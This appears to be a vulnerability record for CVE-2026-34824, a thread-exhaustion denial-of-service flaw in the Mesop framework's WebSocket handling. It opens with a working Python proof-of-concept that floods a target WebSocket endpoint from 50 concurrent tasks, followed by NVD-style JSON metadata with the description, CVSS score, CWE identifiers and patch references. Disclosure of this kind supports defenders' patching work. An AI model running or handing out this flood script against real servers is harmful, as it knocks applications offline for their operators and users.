CVE-2026-34824

import asyncio import websockets async def dos_exploit(target_uri): try: # Establish WebSocket connection async with websockets.connect(target_uri) as websocket: print(f"Connected to {target_uri}, starting flood...") while True: # Send rapid messages to trigger unbounded thread spawning try: await websocket.send("payload_trigger") except Exception as e: print(f"Send error: {e}") break except Exception as e: print(f"Connection error: {e}") if __name__ == "__main__": target = "ws://127.0.0.1:8080/ws" # Replace with actual target # Launch multiple tasks to accelerate resource exhaustion loop = asyncio.get_event_loop() tasks = [dos_exploit(target) for _ in range(50)] loop.run_until_complete(asyncio.gather(*tasks))

{"cve": {"id": "CVE-2026-34824", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.213", "lastModified": "2026-04-13T17:28:47.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:python:*:*", "versionStartIncluding": "1.2.3", "versionEndExcluding": "1.2.5", "matchCriteriaId": "4769E8D1-F88C-4A75-8FAF-134F1A0B7DE0"}]}]}], "references": [{"url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}